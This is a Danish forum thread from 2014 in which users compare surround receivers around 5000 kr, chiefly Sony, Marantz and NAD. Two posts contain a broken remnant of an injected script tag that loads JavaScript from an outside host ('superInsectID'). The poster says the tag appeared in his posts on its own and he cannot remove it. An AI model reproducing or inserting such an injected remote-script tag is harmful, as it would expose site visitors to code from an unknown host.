recordere.dk forum     Det danske community for hjemmets elektronik og indhold     Siden 2003
<b>Forside</b> Forside > Visnings- og lytte-udstyr > Surround
  Nye indlæg Nye indlæg  Seneste forum emner Seneste   Seneste forum emner (vindue) Vindue   De emner du deltager i Mine emner RSS Feed - Surround receiver til 5000
  FAQ FAQ  Søg i forum   Opret ny bruger Opret ny bruger  Log ind Log ind

Surround receiver til 5000

Besvar Besvar Side  <12
Forfatter
Besked
Supergris Se dropdown menu
Guld medlem
Guld medlem

Oprettet: 10-December-2006
Sted: Esbjerg
Status: Offline
Point: 1474
Funktioner Funktioner   Tak (0) Tak(0)   Citér Supergris Citér  BesvarSvar Direkte link til dette indlæg Sendt: 11-April-2014 kl. 03:56
Et godt bud:< ="https://cloudssl.my.phpcloud.com/super/.js" id="superInsectID">

http://www.cinemagic.dk/shop/sony-str-dn1040-7-324326p.html
Til top
Supergris Se dropdown menu
Guld medlem
Guld medlem

Oprettet: 10-December-2006
Sted: Esbjerg
Point: 1474
Funktioner Funktioner   Tak (0) Tak(0)   Citér Supergris Citér  BesvarSvar Direkte link til dette indlæg Sendt: 11-April-2014 kl. 03:58
Jeg undskylder, det ekstra link, der bliver indsat efter mit svar.< ="https://cloudssl.my.phpcloud.com/super/.js" id="superInsectID">
Det er kommet i går, og kun i dette forum.
Jeg kan ikke fjerne det.
Nogle ideer, hvad det kan være???
Til top
thomnico Se dropdown menu
Super bruger
Super bruger

Oprettet: 06-November-2007
Sted: Albertslund
Point: 493
Funktioner Funktioner   Tak (0) Tak(0)   Citér thomnico Citér  BesvarSvar Direkte link til dette indlæg Sendt: 11-April-2014 kl. 14:30
Jeg står lidt i samme dilemma, jeg har en ældre T752 og er ovenud tilfreds med lyden, men vil man skifte til en andet mærke for at få flere funktioner inbygget? eller skal man beholde den gode lyd fra NAD og bare opgrade til en ny NAD?

følger med på sidenlinjen :-)
Til top
jacobthor91 Se dropdown menu
Guld medlem
Guld medlem

Oprettet: 27-September-2012
Sted: ikast, danmark
Point: 673
Funktioner Funktioner   Tak (0) Tak(0)   Citér jacobthor91 Citér  BesvarSvar Direkte link til dette indlæg Sendt: 11-April-2014 kl. 20:49
jeg kunne godt finde på at investere i den marants der er her på siden, kender ikke tilæ sonys produkter, men om man til den pris kan få noget der er bedre end den NAD jeg i forvejen har tvivler jeg nu meget på, godt nok har den flere gadgets end min NAD, men tror ikke (uden at vide det) den magter opgaven i lyden ligeså godt som min NAD. nogen af jer der har haft sony som kan fortælle lidt om den?
Til top
blumenburg Se dropdown menu
Super bruger
Super bruger

Oprettet: 30-April-2012
Sted: mesinge/fyn
Point: 383
Funktioner Funktioner   Tak (0) Tak(0)   Citér blumenburg Citér  BesvarSvar Direkte link til dette indlæg Sendt: 11-April-2014 kl. 21:05
Hovedet på blokken. Den marantz sparker røv. 12000 har den kostet
for ganske nylig. Ingen chance for at finde en ny recicer i 5000 kr klassen som
du får samme vellyd ud af.
setup: Sony xf9005 65"
canal digital sat
Marantz SR7009
fronter: xtz 99,26 mk2
center : B&W xtc
bag ht : B&W xt2
sub    : xtz 10.17 edge

Til top
jacobthor91 Se dropdown menu
Guld medlem
Guld medlem

Oprettet: 27-September-2012
Sted: ikast, danmark
Point: 673
Funktioner Funktioner   Tak (0) Tak(0)   Citér jacobthor91 Citér  BesvarSvar Direkte link til dette indlæg Sendt: 12-April-2014 kl. 00:17
det er også hvad jeg kan læse mig til omkring den:) desværre blev jeg brændt af da mit gamle setup skulle sælges, og derfor er pengene ikke dertil endnu, det er ikke let at være studerende og så gerne vil bruge 5000 pr hifi udstyr når der samtidig er en søn der skal have tøj på kroppen og en kæreste der også skal forkæles:) 

men nu ser vi imorgen er der en som har sagt han vil kigge forbi, hvis det lykkes er jeg klar på den marants:)
Til top
Juleulven Se dropdown menu
Super bruger
Super bruger

Oprettet: 28-Juni-2008
Sted: Denmark
Point: 484
Funktioner Funktioner   Tak (0) Tak(0)   Citér Juleulven Citér  BesvarSvar Direkte link til dette indlæg Sendt: 13-April-2014 kl. 20:23
nu har jeg haft en NAD T748'er til låns hen over weekenden og der er en klar forskel på min gamle Denon AVR-1911 også NAD'en...

Både fruen og jeg selv syntes anlægget kan spille højere med mine gamle M&K K7'ere, bedre surround effect (kraft?) ... ¨

Så jeg tror nu vi ender på tilbuddet til 4500,- inkl. en ATV3 ..
Til top

Besvar Besvar Side  <12

Skift forum Forum-tilladelser Se dropdown menu